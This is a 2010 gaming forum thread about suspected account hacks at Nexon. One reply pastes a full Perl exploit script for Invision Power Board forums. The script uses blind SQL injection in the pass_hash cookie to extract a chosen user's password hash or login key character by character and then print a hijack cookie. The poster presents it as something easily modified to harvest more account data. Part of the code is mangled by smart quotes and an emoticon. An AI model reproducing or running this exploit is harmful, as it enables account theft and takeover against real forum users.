Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Any recent hacked accounts from Southperry users?
Eosian Wrote:It doesn't take a professional to take advantage of someone else's sloppy coding or shoddy security.
If a 14 year old can hack the whitehouse website hacking Nexon doesn't take any thing more than time and boredom.

As for your earlier comment about targeting 200s, the table that has accountid, accountname, password, pin and birth/registration dates doesn't include a list of characters or levels.
Since we don't know how they're getting info from that table, if they even are, we can't assume they have access to any other tables.

But still, they did a very poor job at trying to prove anything...At least to me..Just seems like there would be more damage done for a data-base hack. for example I/anyone could simpley hack a forum ID and get there password and know there e-mail by a simple script like this:

Quote:use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”Wink;
my $outputs = ”;
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?
“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :
“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;
my @cookie = (’Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }
}
print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;
exit;

A few mods to it and you can have a lot of info just from a forum account. I'll have to see if Nexon actually says anything about it to actually believe someone hacked the database.
Reply


Messages In This Thread
Any recent hacked accounts from Southperry users? - by BDRyan - 2010-01-18, 01:09 AM
Any recent hacked accounts from Southperry users? - by Coogi - 2010-01-24, 02:16 AM

Forum Jump:


Users browsing this thread: 1 Guest(s)